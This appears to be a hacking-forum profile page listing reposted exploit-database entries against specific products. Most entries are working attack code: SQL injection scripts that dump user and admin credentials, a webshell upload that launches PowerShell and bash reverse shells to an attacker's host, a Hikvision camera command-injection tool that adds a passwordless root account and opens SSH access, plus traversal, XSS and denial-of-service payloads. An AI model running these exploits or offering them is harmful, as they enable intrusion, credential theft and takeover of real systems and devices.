Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Online Motorcycle (Bike) Rental System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Motorcycle (Bike) Rental System 1.0 - Blind Time-Based SQL Injection (Unauthenticated) # Exploit Author: Chase Comardelle(CASO) # Date: October 18, 2021 # Vendor Homepage: https://www.sourcecodester.com/php/14989/online-motorcycle-bike-rental-system-phpoop-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/bike_rental_0.zip # Tested on: Kali Linux, Apache, Mysql # Vendor: oretnom23 # Version: v1.0 # Exploit Description: # Online Motorcycle (Bike) Rental System is vulnerable to a Blind Time-Based SQL Injection attack. This can lead attackers to remotely dump MySql database credentials #EXAMPLE PAYLOAD - test@email.com' UNION SELECT IF((SELECT SUBSTRING((SELECT password from users where username='admin'),1,1)='1'),sleep(10),'a'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL; #EXAMPLE EXECUTION - python3 sqliExploit.py http://localhost/bike_rental/ import requests import sys import urllib3 import pyfiglet urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'} def find_clients_usernames(url): clients = "" cookies = {'Cookie:':'PHPSESSID='} headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'} path = '/classes/Login.php?f=login_user' position = 1 i=0 while i <len(chars) : sqli = "email=test@email.com'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(email+SEPARATOR+',')+from+clients),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i]) r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False) if r.elapsed.total_seconds() > 1: clients += chars[i] i=0 position+=1 else: i +=1 return clients def find_db_usernames(url): users = "" cookies = {'Cookie:':'PHPSESSID='} headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'} path = '/classes/Login.php?f=login_user' position = 1 i=0 while i <len(chars) : sqli = "email=test@email.com'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(username+SEPARATOR+',')+from+users),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i]) r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False) if r.elapsed.total_seconds() > 1: users += chars[i] i=0 position+=1 else: i +=1 return users def find_db_passwords(url): passwords = "" clientCount = 0 cookies = {'Cookie:':'PHPSESSID='} headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'} path = '/classes/Login.php?f=login_user' position = 1 i=0 while i <len(chars) : sqli = "email=test@email.com'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(password+SEPARATOR+',')+from+users),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i]) r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False) if r.elapsed.total_seconds() > 1: passwords += chars[i] i=0 position+=1 else: i +=1 return passwords def find_client_passwords(url): passwords = "" clientCount = 0 cookies = {'Cookie:':'PHPSESSID='} headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'} path = '/classes/Login.php?f=login_user' position = 1 i=0 while i <len(chars) : sqli = "email=test@email.com'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(password+SEPARATOR+',')+from+clients),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i]) r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False) if r.elapsed.total_seconds() > 1: passwords += chars[i] i=0 position+=1 else: i +=1 return passwords def create_table(users,passwords): for i in range(0,len(users)): print(users[i]," | ",passwords[i]) def print_header(): print("[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]") print("[*] Online Motorcycle (Bike) Rental System [*]") print("[*] Unauthenticated Blind Time-Based SQL Injection [*]") print("[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]") print("\n") print(pyfiglet.figlet_format(" CAS0", font = "slant" )) chars = [ 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o', 'p','q','r','s','t','u','v','w','x','y','z','A','B','C','D', 'E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S', 'T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7', '8','9','@','#',",",'.'] if __name__ == "__main__": try: url = sys.argv[1].strip() except IndexError: print("[-] Usage: %s <url>" % sys.argv[0]) print("[-] Example: %s www.example.com" % sys.argv[0]) sys.exit(-1) print_header() print("[*] RETRIEVING CREDENTIALS NOW [*]") dbUsernames = find_db_usernames(url) dbUsernames = dbUsernames.split(",") dbPasswords = find_db_passwords(url) dbPasswords = dbPasswords.split(",") print("[*] DATABASE CREDENTIALS [*]") create_table(dbUsernames,dbPasswords) clientUsernames = find_clients_usernames(url) clientsUsernames = clientUsernames.split(",") clientPasswords = find_client_passwords(url) clientPasswords = clientPasswords.split(",") print("[*] CLIENT CREDENTIALS [*]") create_table(clientsUsernames,clientPasswords)
  2. HireHackking

    NIMax 5.3.1f0 - 'VISA Alias' Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: NIMax 5.3.1f0 - 'VISA Alias' Denial of Service (PoC) # Date: 24/06/2021 # Exploit Author: LinxzSec # Vulnerability: Local Denial of Service (DoS) # Vendor Homepage: https://www.ni.com/en-gb.html # Software Link: License Required - https://knowledge.ni.com/KnowledgeArticleDetails?id=kA03q000000YGQwCAO&l=en-GB # Tested Version: 5.3.1f0 # Tested On: Windows 10 Pro x64 '''[ POC ] 1 - Copy printed "AAAAA..." string from "nimax.txt" 2 - Open NIMax.exe 3 - Drop down "My System" then drop down "Software" 5 - Locate "NI-VISA 5.2" and select it 6 - Open the "VISA Options" tab 7 - Drop down "General settings" 8 - Select "Aliases" 9 - Select "Add alias" 10 - Paste string from "nimax.txt" into "Resource name" 11 - Just put a single character in the alias and press "ok", DoS will occur ''' buffer = "\x41" * 5000 try: f = open("nimax.txt", "w") f.write(buffer) f.close() print("[+] File created!") except: print("[+] File could not be created!")
  3. HireHackking

    Clinic Management System 1.0 - SQL injection to Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Clinic Management System 1.0 - SQL injection to Remote Code Execution # Date:21/10/2021 # Exploit Author: Pablo Santiago # Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip # Version: 1.0 # Tested on: Windows 7 and Ubuntu 21.10 # References: https://medium.com/@Pablo0xSantiago/clinic-management-system-1-0-sql-injection-bypass-to-remote-code-execution-804bceac037e # Vulnerability: Through SQL injection to bypass the login form it is # possible to upload a malicious file and after use that malicious file to # execute code in the remote system. # Proof of Concept: import requests import sys import time session = requests.Session() #http_proxy = "http://127.0.0.1:8080" #https_proxy = "https://127.0.0.1:8080" #proxyDict = {"http" : http_proxy, # "https" : https_proxy} def windows(HPW,host,shell_name): payload = """powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0){%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()""""" host2 = host+'/'+'uploadImage/Logo/' + shell_name + '.php?cmd='+payload #print(payload) try: request_rce = requests.get(host2,timeout=8) except requests.exceptions.ReadTimeout: pass def linux(HPL,host,shell_name): payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/'+HPL+'+0>%261"' host2 = host+'/'+'/uploadImage/Logo/' + shell_name + '.php?cmd='+payload #print(payload) try: request_rce = requests.get(host2,timeout=8) except requests.exceptions.ReadTimeout: pass def main(): host = sys.argv[1] shell_name = sys.argv[2] url = host + '/login.php' values = {'user': "admin", 'email': "' OR 1 -- -", 'password': '', 'btn_login': "" } r = session.post(url, data=values) cookie = session.cookies.get_dict()['PHPSESSID'] data = { 'btn_web':''} headers= {'Cookie': 'PHPSESSID='+cookie} request = session.post(host+ '/manage_website.php', data=data, headers=headers,files={"website_image":(shell_name+'.php',"<?=`$_GET[cmd]`?>")}) print("") print('[*] Your Simple Webshell was uploaded to ' + host + '/uploadImage/Logo/' + shell_name + '.php' ) print("") LHOST = input('[+] Enter your LHOST: ') LPORT = input('[+] Enter your LPORT: ') print("") HPW= "'"+LHOST+"'"+','+LPORT HPL= ""+LHOST+""+'/'+LPORT print('[+] Option 1: Windows') print('[+] Option 2: Linux') option = input('[+] Choose OS: ') if option == "1": windows(HPW,host,shell_name) exit() elif option == "2": linux(HPL,host,shell_name) exit() else: print("Please choose Windows or Linux") main() #Usage: python3 host shell_name #Example: python3 http://localhost/clinic shell
  4. HireHackking

    Easy Chat Server 3.1 - Directory Traversal and Arbitrary File Read

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Easy Chat Server 3.1 - Directory Traversal and Arbitrary File Read # Date: 11 October 2021 # Exploit Author: z4nd3r # Vendor Homepage: http://www.echatserver.com/ # Software Link: http://www.echatserver.com/ # Version: 3.1 # Tested on: Windows 10 Pro Build 19042, English # # Description: # The web server allows for directory traversal and reading of arbitrary files on the # system, given that the account running the server can access the target file. Proof-of-concept using Burp: Request: GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1 Host: 192.168.50.52 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 ---------------------------------------- Response: HTTP/1.0 200 OK Date: Thu, 21 Oct 2021 14:55:57 GMT Server: Easy Chat Server/1.0 Accept-Ranges: bytes Content-Length: 92 Connection: close Content-Type: text/html ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1
  5. HireHackking

    Small CRM 3.0 - 'description' Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Small CRM 3.0 - 'description' Stored Cross-Site Scripting (XSS) # Date: 20/10/2021 # Exploit Author: Ghuliev # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/small-crm-php/ # Version: 3.0 # Tested on: Server: Ubuntu When a user or admin creates a ticket, we can inject javascript code into ticket. POST /crm/create-ticket.php HTTP/1.1 Host: IP Content-Length: 79 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://IP Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://IP/crm/create-ticket.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,az;q=0.8,ru;q=0.7 subject=aa&tasktype=Select+your+Task+Type&priority=&description=</textarea><script>alert(1)</script>&send=Send
  6. HireHackking

    Jetty 9.4.37.v20210219 - Information Disclosure

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Jetty 9.4.37.v20210219 - Information Disclosure # Date: 2021-10-21 # Exploit Author: Mayank Deshmukh # Vendor Homepage: https://www.eclipse.org/jetty/ # Software Link: https://repo1.maven.org/maven2/org/eclipse/jetty/jetty-distribution/9.4.37.v20210219/ # Version: 9.4.37.v20210219 and 9.4.38.v20210224 # Tested on: Kali Linux # CVE : CVE-2021-28164 POC #1 - web.xml GET /%2e/WEB-INF/web.xml HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0
  7. HireHackking

    Hikvision Web Server Build 210702 - Command Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Hikvision Web Server Build 210702 - Command Injection # Exploit Author: bashis # Vendor Homepage: https://www.hikvision.com/ # Version: 1.0 # CVE: CVE-2021-36260 # Reference: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html # All credit to Watchful_IP #!/usr/bin/env python3 """ Note: 1) This code will _not_ verify if remote is Hikvision device or not. 2) Most of my interest in this code has been concentrated on how to reliably detect vulnerable and/or exploitable devices. Some devices are easy to detect, verify and exploit the vulnerability, other devices may be vulnerable but not so easy to verify and exploit. I think the combined verification code should have very high accuracy. 3) 'safe check' (--check) will try write and read for verification 'unsafe check' (--reboot) will try reboot the device for verification [Examples] Safe vulnerability/verify check: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check Safe and unsafe vulnerability/verify check: (will only use 'unsafe check' if not verified with 'safe check') $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot Unsafe vulnerability/verify check: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot Launch and connect to SSH shell: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell Execute command: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd "ls -l" Execute blind command: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind "reboot" $./CVE-2021-36260.py -h [*] Hikvision CVE-2021-36260 [*] PoC by bashis <mcw noemail eu> (2021) usage: CVE-2021-36260.py [-h] --rhost RHOST [--rport RPORT] [--check] [--reboot] [--shell] [--cmd CMD] [--cmd_blind CMD_BLIND] [--noverify] [--proto {http,https}] optional arguments: -h, --help show this help message and exit --rhost RHOST Remote Target Address (IP/FQDN) --rport RPORT Remote Target Port --check Check if vulnerable --reboot Reboot if vulnerable --shell Launch SSH shell --cmd CMD execute cmd (i.e: "ls -l") --cmd_blind CMD_BLIND execute blind cmd (i.e: "reboot") --noverify Do not verify if vulnerable --proto {http,https} Protocol used $ """ import os import argparse import time import requests from requests import packages from requests.packages import urllib3 from requests.packages.urllib3 import exceptions class Http(object): def __init__(self, rhost, rport, proto, timeout=60): super(Http, self).__init__() self.rhost = rhost self.rport = rport self.proto = proto self.timeout = timeout self.remote = None self.uri = None """ Most devices will use self-signed certificates, suppress any warnings """ requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) self.remote = requests.Session() self._init_uri() self.remote.headers.update({ 'Host': f'{self.rhost}:{self.rport}', 'Accept': '*/*', 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.9,sv;q=0.8', }) """ self.remote.proxies.update({ # 'http': 'http://127.0.0.1:8080', }) """ def send(self, url=None, query_args=None, timeout=5): if query_args: """Some devices can handle more, others less, 22 bytes seems like a good compromise""" if len(query_args) > 22: print(f'[!] Error: Command "{query_args}" to long ({len(query_args)})') return None """This weird code will try automatically switch between http/https and update Host """ try: if url and not query_args: return self.get(url, timeout) else: data = self.put('/SDK/webLanguage', query_args, timeout) except requests.exceptions.ConnectionError: self.proto = 'https' if self.proto == 'http' else 'https' self._init_uri() try: if url and not query_args: return self.get(url, timeout) else: data = self.put('/SDK/webLanguage', query_args, timeout) except requests.exceptions.ConnectionError: return None except requests.exceptions.RequestException: return None except KeyboardInterrupt: return None """302 when requesting http on https enabled device""" if data.status_code == 302: redirect = data.headers.get('Location') self.uri = redirect[:redirect.rfind('/')] self._update_host() if url and not query_args: return self.get(url, timeout) else: data = self.put('/SDK/webLanguage', query_args, timeout) return data def _update_host(self): if not self.remote.headers.get('Host') == self.uri[self.uri.rfind('://') + 3:]: self.remote.headers.update({ 'Host': self.uri[self.uri.rfind('://') + 3:], }) def _init_uri(self): self.uri = '{proto}://{rhost}:{rport}'.format(proto=self.proto, rhost=self.rhost, rport=str(self.rport)) def put(self, url, query_args, timeout): """Command injection in the <language> tag""" query_args = '<?xml version="1.0" encoding="UTF-8"?>' \ f'<language>$({query_args})</language>' return self.remote.put(self.uri + url, data=query_args, verify=False, allow_redirects=False, timeout=timeout) def get(self, url, timeout): return self.remote.get(self.uri + url, verify=False, allow_redirects=False, timeout=timeout) def check(remote, args): """ status_code == 200 (OK); Verified vulnerable and exploitable status_code == 500 (Internal Server Error); Device may be vulnerable, but most likely not The SDK webLanguage tag is there, but generate status_code 500 when language not found I.e. Exist: <language>en</language> (200), not exist: <language>EN</language> (500) (Issue: Could also be other directory than 'webLib', r/o FS etc...) status_code == 401 (Unauthorized); Defiantly not vulnerable """ if args.noverify: print(f'[*] Not verifying remote "{args.rhost}:{args.rport}"') return True print(f'[*] Checking remote "{args.rhost}:{args.rport}"') data = remote.send(url='/', query_args=None) if data is None: print(f'[-] Cannot establish connection to "{args.rhost}:{args.rport}"') return None print('[i] ETag:', data.headers.get('ETag')) data = remote.send(query_args='>webLib/c') if data is None or data.status_code == 404: print(f'[-] "{args.rhost}:{args.rport}" do not looks like Hikvision') return False status_code = data.status_code data = remote.send(url='/c', query_args=None) if not data.status_code == 200: """We could not verify command injection""" if status_code == 500: print(f'[-] Could not verify if vulnerable (Code: {status_code})') if args.reboot: return check_reboot(remote, args) else: print(f'[+] Remote is not vulnerable (Code: {status_code})') return False print('[!] Remote is verified exploitable') return True def check_reboot(remote, args): """ We sending 'reboot', wait 2 sec, then checking with GET request. - if there is data returned, we can assume remote is not vulnerable. - If there is no connection or data returned, we can assume remote is vulnerable. """ if args.check: print('[i] Checking if vulnerable with "reboot"') else: print(f'[*] Checking remote "{args.rhost}:{args.rport}" with "reboot"') remote.send(query_args='reboot') time.sleep(2) if not remote.send(url='/', query_args=None): print('[!] Remote is vulnerable') return True else: print('[+] Remote is not vulnerable') return False def cmd(remote, args): if not check(remote, args): return False data = remote.send(query_args=f'{args.cmd}>webLib/x') if data is None: return False data = remote.send(url='/x', query_args=None) if data is None or not data.status_code == 200: print(f'[!] Error execute cmd "{args.cmd}"') return False print(data.text) return True def cmd_blind(remote, args): """ Blind command injection """ if not check(remote, args): return False data = remote.send(query_args=f'{args.cmd_blind}') if data is None or not data.status_code == 500: print(f'[-] Error execute cmd "{args.cmd_blind}"') return False print(f'[i] Try execute blind cmd "{args.cmd_blind}"') return True def shell(remote, args): if not check(remote, args): return False data = remote.send(url='/N', query_args=None) if data.status_code == 404: print(f'[i] Remote "{args.rhost}" not pwned, pwning now!') data = remote.send(query_args='echo -n P::0:0:W>N') if data.status_code == 401: print(data.headers) print(data.text) return False remote.send(query_args='echo :/:/bin/sh>>N') remote.send(query_args='cat N>>/etc/passwd') remote.send(query_args='dropbear -R -B -p 1337') remote.send(query_args='cat N>webLib/N') else: print(f'[i] Remote "{args.rhost}" already pwned') print(f'[*] Trying SSH to {args.rhost} on port 1337') os.system(f'stty echo; stty iexten; stty icanon; \ ssh -o StrictHostKeyChecking=no -o LogLevel=error -o UserKnownHostsFile=/dev/null \ P@{args.rhost} -p 1337') def main(): print('[*] Hikvision CVE-2021-36260\n[*] PoC by bashis <mcw noemail eu> (2021)') parser = argparse.ArgumentParser() parser.add_argument('--rhost', required=True, type=str, default=None, help='Remote Target Address (IP/FQDN)') parser.add_argument('--rport', required=False, type=int, default=80, help='Remote Target Port') parser.add_argument('--check', required=False, default=False, action='store_true', help='Check if vulnerable') parser.add_argument('--reboot', required=False, default=False, action='store_true', help='Reboot if vulnerable') parser.add_argument('--shell', required=False, default=False, action='store_true', help='Launch SSH shell') parser.add_argument('--cmd', required=False, type=str, default=None, help='execute cmd (i.e: "ls -l")') parser.add_argument('--cmd_blind', required=False, type=str, default=None, help='execute blind cmd (i.e: "reboot")') parser.add_argument( '--noverify', required=False, default=False, action='store_true', help='Do not verify if vulnerable' ) parser.add_argument( '--proto', required=False, type=str, choices=['http', 'https'], default='http', help='Protocol used' ) args = parser.parse_args() remote = Http(args.rhost, args.rport, args.proto) try: if args.shell: shell(remote, args) elif args.cmd: cmd(remote, args) elif args.cmd_blind: cmd_blind(remote, args) elif args.check: check(remote, args) elif args.reboot: check_reboot(remote, args) else: parser.parse_args(['-h']) except KeyboardInterrupt: return False if __name__ == '__main__': main()
  8. HireHackking

    Online Course Registration 1.0 - Blind Boolean-Based SQL Injection (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Course Registration 1.0 - Blind Boolean-Based SQL Injection (Authenticated) # Exploit Author: Sam Ferguson (@AffineSecurity) and Drew Jones (@qhum7sec) # Date: 2021-10-21 # Vendor Homepage: https://www.sourcecodester.com/php/14251/online-course-registration.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip # Version: 1.0 # Tested On: Windows 10 + XAMPP + Python 3 # Vulnerability: An attacker can perform a blind boolean-based SQL injection attack, which can provide attackers # with access to the username and md5 hash of any administrators. # Vulnerable file: /online-course-registration/Online/pincode-verification.php # Proof of Concept: #!/usr/bin/python3 import requests import sys import string def exploit(hostname, username, password): # Building bruteforce list pass_list = list(string.ascii_lowercase) pass_list += list(range(0,10)) pass_list = map(str, pass_list) pass_list = list(pass_list) user_list = pass_list user_list += list(string.ascii_uppercase) user_list = map(str, user_list) user_list = list(user_list) session = requests.Session() # This URL may change based on the implementation - change as needed url = f"{hostname}/online-course-registration/Online/index.php" headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/index.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"} data = {"regno": f"{username}", "password": f"{password}", "submit": ''} r = session.post(url, headers=headers, data=data) print("Admin username:") # This range number is pretty arbitrary, so change it to whatever you feel like for i in range(1,33): counter = 0 find = False for j in user_list: # This URL may change based on the implementation - change as needed url = f"{hostname}/online-course-registration/Online/pincode-verification.php" headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/pincode-verification.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"} data = {"pincode": f"' or (select(select (substring(username,{i},1)) from admin) = \"{j}\") -- - #", "submit": ''} a = session.post(url, headers=headers, data=data) counter += 1 if 'Course Enroll' in a.text: sys.stdout.write(j) sys.stdout.flush() break elif counter == len(user_list): find = True break if find: break print("\n") print("Admin password hash:") # This range is not arbitrary and will cover md5 hashing - if the hashing implementation is different, change as needed for i in range(1,33): counter = 0 find = False for j in pass_list: url = f"{hostname}/online-course-registration/Online/pincode-verification.php" headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/pincode-verification.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"} data = {"pincode": f"' or (select(select (substring(password,{i},1)) from admin) = \"{j}\") -- - #", "submit": ''} a = session.post(url, headers=headers, data=data) counter += 1 if 'Course Enroll' in a.text: sys.stdout.write(j) sys.stdout.flush() break elif counter == len(pass_list): find = True break if find: break print("\n\nSuccessfully pwnd :)") def logo(): art = R''' __/\\\\\\\\\\\\\____/\\\\\\\\\\\__/\\\\\_____/\\\__/\\\\_________/\\\__ _\/\\\/////////\\\_\/////\\\///__\/\\\\\\___\/\\\_\///\\________\/\\\__ _\/\\\_______\/\\\_____\/\\\_____\/\\\/\\\__\/\\\__/\\/_________\/\\\__ _\/\\\\\\\\\\\\\/______\/\\\_____\/\\\//\\\_\/\\\_\//___________\/\\\__ _\/\\\/////////________\/\\\_____\/\\\\//\\\\/\\\__________/\\\\\\\\\__ _\/\\\_________________\/\\\_____\/\\\_\//\\\/\\\_________/\\\////\\\__ _\/\\\_________________\/\\\_____\/\\\__\//\\\\\\________\/\\\__\/\\\__ _\/\\\______________/\\\\\\\\\\\_\/\\\___\//\\\\\________\//\\\\\\\/\\_ _\///______________\///////////__\///_____\/////__________\///////\//__ ''' info = 'CVE-2021-37357 PoC'.center(76) credits = 'Created by @AffineSecurity and @qhum7sec'.center(76) print(f"{art}\n{info}\n{credits}") def main(): logo() hostname = sys.argv[1] username = sys.argv[2] password = sys.argv[3] if len(sys.argv) != 4: print("Usage: python3 exploit.py http://127.0.0.1:80 username password") exploit(hostname, username, password) if __name__ == '__main__': main()
  9. HireHackking

    Netgear Genie 2.4.64 - Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Netgear Genie 2.4.64 - Unquoted Service Path # Exploit Author: Mert DAŞ # Version: 2.4.64 # Date: 23.10.2021 # Vendor Homepage: https://www.netgear.com/ # Tested on: Windows 10 C:\Users\Mert>sc qc NETGEARGenieDaemon [SC] QueryServiceConfig SUCCESS SERVICE_NAME: NETGEARGenieDaemon TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\NETGEAR Genie\bin\NETGEARGenieDaemon64.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : NETGEARGenieDaemon DEPENDENCIES : SERVICE_START_NAME : LocalSystem Or: ------------------------- C:\Users\Mert>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  10. HireHackking

    WordPress Plugin TaxoPress 3.0.7.1 - Stored Cross-Site Scripting (XSS) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin TaxoPress 3.0.7.1 - Stored Cross-Site Scripting (XSS) (Authenticated) # Date: 23-10-2021 # Exploit Author: Akash Rajendra Patil # Vendor Homepage: # Software Link: https://wordpress.org/plugins/simple-tags/ # Tested on Windows # CVE: CVE-2021-24444 # https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24444 # Reference: https://wpscan.com/vulnerability/a31321fe-adc6-4480-a220-35aedca52b8b How to reproduce vulnerability: 1. Install Latest WordPress 2. Install and activate TaxoPress Version 3.0.7.1 3. Navigate to Add Table >> add the payload into 'Table Name & Descriptions' and enter the data into the user input field. 4. Enter JavaScript payload which is mentioned below "><img src=x onerror=confirm(docment.domain)> 5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality in that time JavaScript payload is executing successfully and we are getting a pop-up.
  11. HireHackking

    Engineers Online Portal 1.0 - File Upload Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
